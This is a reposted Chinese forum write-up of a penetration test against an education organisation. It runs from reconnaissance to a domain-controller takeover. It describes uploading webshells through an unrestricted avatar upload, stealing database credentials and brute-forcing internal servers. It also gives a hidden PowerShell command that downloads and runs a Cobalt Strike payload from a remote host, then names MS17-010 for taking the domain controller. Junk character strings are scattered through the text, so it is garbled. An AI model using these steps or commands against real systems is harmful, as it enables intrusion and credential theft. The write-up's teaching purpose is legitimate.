|
o& b! M0 `* B( a 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
& o z! I3 O. {% n" [6 m3 p, v1 e, y * B( |# Y7 t1 H: ^3 W8 a
5 Q6 C8 p1 V4 o( M! S: I
# u6 _5 H! C4 m- ]# W7 D2 r - t* Q' O; m. b3 o3 K' W4 _
4 \& Q5 U: p6 s* e
正文
! h$ S5 @7 ^; I! K: T 9 W' K% O; u/ N
7 `9 P) ]1 T; |( s/ R6 _# S , B$ L$ c1 g3 t1 [
8 N! \" s6 P6 K2 D0 _ m Q: C) I/ G* b' d
目标:www.xxxx.com(一家教育机构) % M6 H, d% K/ C( t0 n
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
3 K6 m+ ]& s4 O$ n- A W, ^7 l3 i9 `5 A
+ |3 L! \9 H% r' X5 \
5 G, E! G+ j. _) p# s
2 a: N! F' w& R 5 u% r- n5 W% z3 M
5 s) Q# O- A4 B/ x3 B
进行了简单的信息搜集
* C7 b- c# d9 E) b( r / u. J* @6 I1 b7 G3 b! t# n
! j" m5 G8 J* m n7 l) K0 f5 P6 [5 u 8 X, t6 A8 ?6 O% y# O( j% u3 l* r
% v6 X, Y& o9 G
子域名搜集
$ b! `, E3 c+ V% W
! }9 K3 y \ }: L1 |& d: ?- v U" u! p# ~; f- ^$ z
) T, i; ]) I3 F: O4 g. O& F( M
8 X# `1 {+ ]* ]! s3 Z* {, ]! M
0 L# B7 U M0 v, v, u
fofa找资产
9 f l+ D4 l7 A. F& x! v" z
" ` h( ~! b5 s/ B6 e/ D' K8 {4 `/ y! Q7 I2 Y
4 X0 S$ k5 a* | `* k
3 Q8 R0 C' x: K: F# j3 l$ y3 j
c V6 z, t, r , s) K% l) l* A. v+ R
" S2 X1 m' [" \, J B 一共七个资产。去重之后只有两个。
6 C* ]/ t2 d L1 S+ e% ]) H! \ & L/ l! z3 J) `3 D3 j
U8 f; r3 ~4 v1 S3 q
- C7 G/ T: M. Z# i
( k D @, I0 \5 v
目录探测
7 \2 F u+ ?% o4 l
- v& Z" T: |7 k( S( _. v* E% _: C3 a) A( b" t/ f& Z5 z
2 K) k& k: U5 J5 E " p5 n3 v. \2 O' m+ a( N
3 V4 F8 M; h7 g% w 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 # q" W; ?. y; U* @
$ `+ h+ w' U3 T' Q, o) H- \- m% Z
* q5 S/ M% O9 _4 ]" C9 p/ Q( s 2 J7 [# o. k; P; T9 t% {3 Q& i) l9 D
" d; U+ [; P* D8 R
我又尝试了通过修改返回包来绕过登录界面6 c+ t, B9 l0 @+ z( p$ ^8 w$ t
% y% V& [7 K+ t; g. Z: t R& |5 F
8 B5 k9 O6 e, W
4 Q& w& s2 H+ d. f o6 f; B+ j% _
& a+ A0 J, G; i% {4 v5 a. g- t 还是不行,尝试注入无果
F: ~# b2 Y; s- i: R8 D 2 y9 `5 q; }8 ^+ ~
* j7 ]( Y8 {, @1 q
# C- M! ?- v- g) q6 |1 b" U1 b 9 G+ N* [6 M$ _. ~
1 R( ~* g: ?# W# ? 不过我目录探测出了一处Spring信息泄露 + W4 B4 _+ X& `3 D c& N
0 J O8 g1 ]: F8 @; z h6 l
# H X' l$ y: i0 U
) ]7 \/ i) H9 z/ Y- W3 d* e. r
6 Y: l3 e" r+ B& X1 ?- F1 n
# h; H: |3 o% t2 D* f7 }
9 a) A7 \: d3 p& Z) @) U' k, y( U- n) j' y
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
v) a6 ?: z/ E j
+ w& A0 T+ d" H) e7 y& O! E+ P: k T- ~, h
, R- S \& k' T- y8 w1 ~
# O, E3 I! {( K4 h
' W# o0 K8 I6 v) p 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
& Q, X: ^$ p! b / y1 a. I& _3 c
2 }& F4 b# R5 w; s* z
% a7 Q, l B0 E* H
/ |7 X/ A, x! |8 }
( }0 d9 r* I0 @# A' ^2 T 获取有些师傅到这一步就手机抓包电脑测了。; N9 X" m' n0 \8 d+ [: y
8 a& d4 ?9 _) Y; W
& T* f1 A& m/ g% |2 o Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
' ?9 g$ r& Y5 l6 z- h I / [' q$ H: q& c' C* \" o
! g' Z2 M. n7 I4 | C$ \) q( { 其中在一个公众号发现了小程序,可以进行注册。2 K- |9 p% M$ c# M+ @1 Z6 A
' {. U$ p* T! s! m! i' z
5 y$ O; m: G3 f* H" ? 看到了头像上传,尝试上传获取WebShell
# N5 {0 u8 o z2 }
; D$ h p N; W/ [, R: B/ m1 K+ r8 e" e3 z$ E% F3 h
$ I+ v# G5 m6 H2 g4 y
4 G8 H# L! h' { d8 |! G( I! H8 t2 r. P7 P ^! D
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问; C7 n- k* l7 l) v- x% W) F% o
, m4 r" N/ m% ^4 o, T0 p
- S+ ~* |* c. c9 |' j- r$ z
9 L1 n& s$ E2 m8 a
5 m; w3 }8 d- S+ }7 z: |' ]0 ]# K% n, d/ S; B
然后上了大马
4 S+ ^) N& k1 F" N3 S# g3 F6 O: o$ j
: I7 T6 |7 s: C8 i6 |! g9 Y* a! A% Z, h6 T1 j: ^' K! M P e
2 q& i6 w" V, Z( p
- g: Q4 q- P6 T
! S$ h4 m t& _2 \0 C0 P# w2 h2 H
* e- @" N/ B0 Q0 w( G: y$ p3 Q6 [) f 5 |+ L( y! \3 F' }; \1 o y
/ Q( h6 _; ~" y% T9 A* ^. k 通过翻找文件发现数据库账号密码. F; [- o W4 |* `0 K- U# P
# G; c3 A! P/ u, Y) t( [
. w" u& L' R+ b $ Y; p' ?: p0 B U* r: U# O5 ~; ?
4 w3 t+ X+ |) m: V$ W& }: l- L7 ]3 B9 D
--内网渗透 b i: Q5 |/ B
! ]/ o7 k* {& Z& c! V
! T% z7 y M& g3 |# m( |2 V9 O 直接通过powershell执行 cs上线. S/ @* h* W9 b6 ~
2 x( n: s0 } ~
, s4 i2 b8 B7 i1 C, A powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"0 ?! p1 {3 ?9 [" f
: Q1 E+ W1 H& r: d, L$ j* w: X
$ n7 Q- X0 f ^- H" ] 8 P j- b5 V6 e2 e4 K Z _5 p- x
) r0 s _* ]" M! P4 Z" c q
( ]8 W5 \' G. {$ R# a6 Q7 Y9 |$ l 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
, V" m) Z, W+ r5 D ! Z; w. t' t; N7 h& ]+ l3 a
# U4 r+ E R# X9 m0 P 1 t: X" w1 E/ V% i- g+ M1 A* V- U
4 J- }( ]/ H* A2 b+ `9 b. k, [+ E/ F! _! ?/ y K4 K- ~3 g% p" J1 [
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 - {- [. a x. `7 z0 g& y
6 M) a- C- u6 p, l4 t3 M B- U
' P6 G6 s f J" e |) H6 d
3 h3 J& G1 [) r* t5 y% D4 p2 w1 o3 L 7 u/ E: V5 s$ g" \8 j$ {" D
' R2 x+ P9 T2 {4 _% I' ^
) e$ m, o4 E7 e4 T7 `+ S
; _8 c1 \1 Z% v, ^1 B2 R, v
& B, U" k& V; G3 g2 t' W
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 * B* N P5 Y, _
B6 P. ~* k5 u+ C8 |. J: P) L
6 k8 Y8 j | N; ?- G - S' s1 w& a; D1 k1 J8 k
; g; l0 {+ j- g# n9 c8 \$ |
; d; L/ Q6 v5 W- ~
$ {0 s0 Q1 E% M5 Z
$ M+ ]% E# _ m& `/ ] % z9 c# }" f& r5 K
2 r% e* i! H2 ^: l |. N5 v/ M5 x4 O, Q; S) N8 I- U9 x
+ R7 { E8 R" L2 f/ Q
, C- b: `% Q4 V
4 {* `0 U7 @, @+ @; j6 g' l
% K, t+ Q) ^, `# m: B
5 }* F0 K. u7 k" \8 d: |) l 小结# }- s O( W* s k2 C4 W
1 S2 }2 D( @8 X4 D% F. [/ D- S6 l: j
8 [0 x& \* V) O& _; x$ o4 z ; I* V! [) i( U5 [
6 H0 A2 u, Q3 m' i" C
9 u( D1 U+ g; H( u- W1 @ 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
' X% e) ]. g W5 ~- h y3 `( x( y
5 u8 ~& V. N. D6 \5 Z4 o- ?
0 k; n; ]8 }" E
7 T. B2 b5 K6 h& @# ^% \$ x) \ * X" P1 e. a3 F' @ A
, s {. b2 d# b0 b% Y( A6 y - + o/ t: V( l6 G( x U7 Z d; z
6 n1 e) y1 f% I! J- s2 _% c
' ~, R% X# Q/ S0 Y" h; w9 [
- 5 |( O, ~ j4 i% j4 w4 X
7 A* O* t: P( O5 S
9 T" I. x5 P, m: |
b' v! Q: ^* ^+ U3 u
7 m1 z) A, L- C+ Z6 r 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html1 b- a; O3 Q9 ?- U" y q5 U
2 a/ S5 h4 g5 q, P! N
- G/ u; G" J1 ?: I % U7 p1 e1 w( n# J0 B. p8 v K
|